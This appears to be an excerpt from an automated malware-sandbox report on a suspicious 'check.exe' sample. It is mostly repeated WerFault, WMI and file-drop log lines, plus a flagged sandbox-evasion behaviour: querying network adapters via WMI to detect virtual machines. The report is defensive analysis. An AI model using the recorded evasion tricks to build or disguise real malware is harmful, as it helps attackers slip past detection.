Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: PyList_New,OpenSCManagerA,GetLastError,PyErr_SetFromWindowsErrWithFilename,EnumServicesStatusExW,GetLastError,free,malloc,EnumServicesStatusExW,PyUnicode_FromWideChar,PyUnicode_FromWideChar,Py_BuildValue,PyList_Append,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,CloseServiceHandle,free,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,CloseServiceHandle,free,

16_2_00007FFB9DD681E0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4349			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5347			Jump to behavior

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\sip.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Network.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qicns.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qico.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qsvg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Quick.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qtiff.dll	Jump to dropped file
